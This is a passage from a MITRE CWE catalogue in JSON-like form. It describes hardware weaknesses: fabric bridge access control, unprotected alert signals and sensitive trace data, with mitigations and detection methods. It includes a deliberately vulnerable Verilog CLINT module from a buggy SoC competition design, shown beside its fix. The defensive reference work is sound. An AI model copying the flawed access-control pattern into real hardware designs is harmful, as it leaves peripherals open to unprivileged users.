"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "Review address map in specification to see if there are any overlapping ranges.",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Dynamic Analysis"
},
{
"Description": "Negative testing of access control on overlapped ranges.",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Manual Static Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "An on-chip fabric supports a 64KB address space that is memory-mapped. The fabric has two range registers that support creation of two protected ranges with specific size constraints--4KB, 8KB, 16KB or 32KB. Assets that belong to user A require 4KB, and those of user B require 20KB. Registers and other assets that are not security-sensitive require 40KB. One range register is configured to program 4KB to protect user A's assets. Since a 20KB range cannot be created with the given size constraints, the range register for user B's assets is configured as 32KB. The rest of the address space is left as open. As a result, some part of untrusted and open-address space overlaps with user B range.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The fabric does not support least privilege, and an attacker can send a transaction to the overlapping region to tamper with user B data.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "Since range B only requires 20KB but is allotted 32KB, there is 12KB of reserved space. Overlapping this region of user B data, where there are no assets, with the untrusted space will prevent an attacker from tampering with user B data.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1316"
]
] |
[] |
1317
|
Improper Access Control in Fabric Bridge
|
Base
|
Simple
|
Draft
|
The product uses a fabric bridge for transactions between two Intellectual Property (IP) blocks, but the bridge does not properly perform the expected privilege, identity, or other access control checks between those IP blocks.
|
In hardware designs, different IP blocks are connected through interconnect-bus fabrics (e.g. AHB and OCP). Within a System on Chip (SoC), the IP block subsystems could be using different bus protocols. In such a case, the IP blocks are then linked to the central bus (and to other IP blocks) through a fabric bridge. Bridges are used as bus-interconnect-routing modules that link different protocols or separate, different segments of the overall SoC interconnect.
For overall system security, it is important that the access-control privileges associated with any fabric transaction are consistently maintained and applied, even when they are routed or translated by a fabric bridge. A bridge that is connected to a fabric without security features forwards transactions to the slave without checking the privilege level of the master and results in a weakness in SoC access-control security. The same weakness occurs if a bridge does not check the hardware identity of the transaction received from the slave interface of the bridge.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": null,
"Name": "Processor Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"DoS: Crash, Exit, or Restart",
"Bypass Protection Mechanism",
"Read Memory",
"Modify Memory"
],
"Likelihood": [
"Medium"
],
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Access Control",
"Availability"
]
}
] |
[
{
"Description": "Ensure that the design includes provisions for access-control checks in the bridge for both upstream and downstream transactions.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Implement access-control checks in the bridge for both upstream and downstream transactions.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] |
[
{
"Description": "Baseboard Management Controller (BMC) device implements Advanced High-performance Bus (AHB) bridges that do not require authentication for arbitrary read and write access to the BMC's physical address space from the host, and possibly the network [REF-1138].",
"Link": "https://www.cve.org/CVERecord?id=CVE-2019-6260",
"Reference": "CVE-2019-6260"
}
] | null | null |
[
"122"
] |
[
{
"Authors": [
"Stewart Smith"
],
"Edition": null,
"ExternalReferenceID": "REF-1138",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2019",
"Publisher": null,
"Section": null,
"Title": "CVE-2019-6260: Gaining control of BMC from the host processor",
"URL": "https://www.flamingspork.com/blog/2019/01/23/cve-2019-6260:-gaining-control-of-bmc-from-the-host-processor/",
"URLDate": null
},
{
"Authors": null,
"Edition": null,
"ExternalReferenceID": "REF-1381",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2021",
"Publisher": null,
"Section": null,
"Title": "aes0_wrapper.sv lines 72 - 78",
"URL": "https://github.com/HACK-EVENT/hackatdac21/blob/b9ecdf6068445d76d6bee692d163fededf7a9d9b/piton/design/chip/tile/ariane/src/aes0/aes0_wrapper.sv#L72-L78",
"URLDate": "2024-01-16"
},
{
"Authors": null,
"Edition": null,
"ExternalReferenceID": "REF-1382",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2021",
"Publisher": null,
"Section": null,
"Title": "clint.sv line 71",
"URL": "https://github.com/HACK-EVENT/hackatdac21/blob/b9ecdf6068445d76d6bee692d163fededf7a9d9b/piton/design/chip/tile/ariane/src/clint/clint.sv#L71C2-L71C36",
"URLDate": "2024-01-16"
},
{
"Authors": null,
"Edition": null,
"ExternalReferenceID": "REF-1383",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2021",
"Publisher": null,
"Section": null,
"Title": "Fix for clint.sv line 78",
"URL": "https://github.com/HACK-EVENT/hackatdac21/blob/45a004368b5a31857008834d9780536f0764f055/piton/design/chip/tile/ariane/src/clint/clint.sv#L78",
"URLDate": "2024-01-16"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-05-19",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-12-10",
"SubmissionVersion": "4.3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, Detection_Factors, Name, Potential_Mitigations",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, References",
"ModificationDate": "2024-02-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-02-29",
"ModificationVersion": "4.14",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-06-21",
"ContributionName": "Chen Chen, Rahul Kande, Jeyavijayan Rajendran",
"ContributionOrganization": "Texas A&M University",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-06-21",
"ContributionName": "Shaza Zeitouni, Mohamadreza Rostami, Ahmad-Reza Sadeghi",
"ContributionOrganization": "Technical University of Darmstadt",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2022-10-13",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Missing Security Checks in Fabric Bridge",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "RTL simulation to ensure that bridge-access controls are implemented properly.",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Simulation / Emulation"
},
{
"Description": "Formal verification of bridge RTL to ensure that access control cannot be bypassed.",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Formal Verification"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This example is from CVE-2019-6260 [REF-1138]. The iLPC2AHB bridge connects a CPU (with multiple, privilege levels, such as user, super user, debug, etc.) over AHB interface to an LPC bus. Several peripherals are connected to the LPC bus. The bridge is expected to check the privilege level of the transactions initiated in the core before forwarding them to the peripherals on the LPC bus.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The bridge does not implement the checks and allows reads and writes from all privilege levels.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "To address this, designers should implement hardware-based checks that are either hardcoded to block untrusted agents from accessing secure peripherals or implement firmware flows that configure the bridge to block untrusted agents from making arbitrary reads or writes.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The example code below is taken from the AES and core local interrupt (CLINT) peripherals of the HACK@DAC'21 buggy OpenPiton SoC. The access to all the peripherals for a given privilege level of the processor is controlled by an access control module in the SoC. This ensures that malicious users with insufficient privileges do not get access to sensitive data, such as the AES keys used by the operating system to encrypt and decrypt information. The security of the entire system will be compromised if the access controls are incorrectly enforced. The access controls are enforced through the interconnect-bus fabrics, where access requests with insufficient access control permissions will be rejected.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "...\n module aes0_wrapper #(...)(...);\n ...\n\n```\n\t input logic acct_ctrl_i;\n ...\n\t axi_lite_interface #(...\n\t ) axi_lite_interface_i (\n\t ...\n```\n.en_o ( en_acct ),** \n\t\t ...\n ..);\n\n```\n```\nassign en = en_acct && acct_ctrl_i;** \n\t ...\n endmodule\n ...\n module clint #(...)(...);\n ...\n\n```\n\t axi_lite_interface #(...\n\t ) axi_lite_interface_i (\n\t ...\n```\n.en_o ( en ),** \n\t\t ...\n );\n ...\n endmodule",
"IntroText": null,
"Language": "Verilog",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The previous code snippet [REF-1382] illustrates an instance of a vulnerable implementation of access control for the CLINT peripheral (see module clint). It also shows a correct implementation of access control for the AES peripheral (see module aes0_wrapper) [REF-1381]. An enable signal (en_o) from the fabric's AXI interface (present in both modules) is used to determine if an access request is made to the peripheral. In the case of the AES peripheral, this en_o signal is first received in a temporary signal en_acct. Then, the access request is enabled (by asserting the en signal) only if the request has sufficient access permissions (i.e., acct_ctrl_i signal should be enabled). However, in the case of the CLINT peripheral, the enable signal, en_o, from the AXI interface, is directly used to enable accesses. As a result, users with insufficient access permissions also get full access to the CLINT peripheral.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "To fix this, enable access requests to CLINT [REF-1383] only if the user has sufficient access as indicated by the acct_ctrl_i signal in the boolean && with en_acct.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "module clint #(...\n ) (\n ... \n\n```\n```\ninput logic acct_ctrl_i,** \n\t ...\n );\n\n```\n\t logic en\n```\n, en_acct** ;\n\t ...\n\n```\n\t axi_lite_interface #(...\n\t ) axi_lite_interface_i (\n ...\n\t .en_o ( \n```\nen_acct** ),\n\t ...\n\n```\n\t );\n```\nassign en = en_acct && acct_ctrl_i;** \n\t ...\n endmodule",
"IntroText": null,
"Language": "Verilog",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1317"
]
] |
[] |
1320
|
Improper Protection for Outbound Error Messages and Alert Signals
|
Base
|
Simple
|
Draft
|
Untrusted agents can disable alerts about signal conditions exceeding limits or the response mechanism that handles such alerts.
|
Hardware sensors are used to detect whether a device is operating within design limits. The threshold values for these limits are set by hardware fuses or trusted software such as a BIOS. Modification of these limits may be protected by hardware mechanisms.
When device sensors detect out of bound conditions, alert signals may be generated for remedial action, which may take the form of device shutdown or throttling.
Warning signals that are not properly secured may be disabled or used to generate spurious alerts, causing degraded performance or denial-of-service (DoS). These alerts may be masked by untrusted software. Examples of these alerts involve thermal and power sensor alerts.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "System on Chip",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": null,
"Name": "Microcontroller Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": null,
"Name": "Memory Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": null,
"Name": "Power Management Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": null,
"Name": "Processor Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": null,
"Name": "Test/Debug Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": null,
"Name": "Sensor Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"DoS: Instability",
"DoS: Crash, Exit, or Restart",
"Reduce Reliability",
"Unexpected State"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Availability"
]
}
] |
[
{
"Description": "Alert signals generated by critical events should be protected from access by untrusted agents. Only hardware or trusted firmware modules should be able to alter the alert configuration.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
}
] | null | null | null |
[
"1",
"180"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-05-29",
"SubmissionName": "Hareesh Khattri, Arun Kanuparthi, Parbati K. Manna",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-12-10",
"SubmissionVersion": "4.3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Name",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2022-10-13",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Improper Protection for Out of Bounds Signal Level Alerts",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Consider a platform design where a Digital-Thermal Sensor (DTS) is used to monitor temperature and compare that output against a threshold value. If the temperature output equals or exceeds the threshold value, the DTS unit sends an alert signal to the processor.\n\n\nThe processor, upon getting the alert, input triggers system shutdown. The alert signal is handled as a General-Purpose-I/O (GPIO) pin in input mode.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "The processor-GPIO controller exposes software-programmable controls that allow untrusted software to reprogram the state of the GPIO pin.",
"IntroText": null,
"Language": null,
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "Reprogramming the state of the GPIO pin allows malicious software to trigger spurious alerts or to set the alert pin to a zero value so that thermal sensor alerts are not received by the processor.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "The GPIO alert-signal pin is blocked from untrusted software access and is controlled only by trusted software, such as the System BIOS.",
"IntroText": null,
"Language": null,
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1320"
]
] |
[] |
1323
|
Improper Management of Sensitive Trace Data
|
Base
|
Simple
|
Draft
|
Trace data collected from several sources on the
System-on-Chip (SoC) is stored in unprotected locations or
transported to untrusted agents.
|
To facilitate verification of complex System-on-Chip (SoC) designs, SoC integrators add specific IP blocks that trace the SoC's internal signals in real-time. This infrastructure enables observability of the SoC's internal behavior, validation of its functional design, and detection of hardware and software bugs. Such tracing IP blocks collect traces from several sources on the SoC including the CPU, crypto coprocessors, and on-chip fabrics. Traces collected from these sources are then aggregated inside trace IP block and forwarded to trace sinks, such as debug-trace ports that facilitate debugging by external hardware and software debuggers.
Since these traces are collected from several security-sensitive sources, they must be protected against untrusted debuggers. If they are stored in unprotected memory, an untrusted software debugger can access these traces and extract secret information. Additionally, if security-sensitive traces are not tagged as secure, an untrusted hardware debugger might access them to extract confidential information.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "System on Chip",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Read Memory"
],
"Likelihood": null,
"Note": "An adversary can read secret values if they are captured in debug traces and stored unsafely.",
"Scope": [
"Confidentiality"
]
}
] |
[
{
"Description": "Tag traces to indicate owner and debugging privilege level (designer, OEM, or end user) needed to access that trace.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] | null | null | null |
[
"150",
"167",
"545"
] |
[
{
"Authors": [
"Jerry Backer",
"David Hely",
"Ramesh Karri"
],
"Edition": null,
"ExternalReferenceID": "REF-1150",
"Publication": null,
"PublicationDay": "06",
"PublicationMonth": "10",
"PublicationYear": "2015",
"Publisher": null,
"Section": null,
"Title": "Secure design-for-debug for Systems-on-Chip",
"URL": "https://ieeexplore.ieee.org/document/7342418",
"URLDate": null
},
{
"Authors": [
"Jerry Backer",
"David Hely",
"Ramesh Karri"
],
"Edition": null,
"ExternalReferenceID": "REF-1151",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": "12",
"PublicationYear": "2016",
"Publisher": null,
"Section": null,
"Title": "Secure and Flexible Trace-Based Debugging of Systems-on-Chip",
"URL": "https://dl.acm.org/doi/pdf/10.1145/2994601",
"URLDate": "2023-04-07"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-07-20",
"SubmissionName": "Hareesh Khattri, Parbati K. Manna, and Arun Kanuparthi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-12-10",
"SubmissionVersion": "4.3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
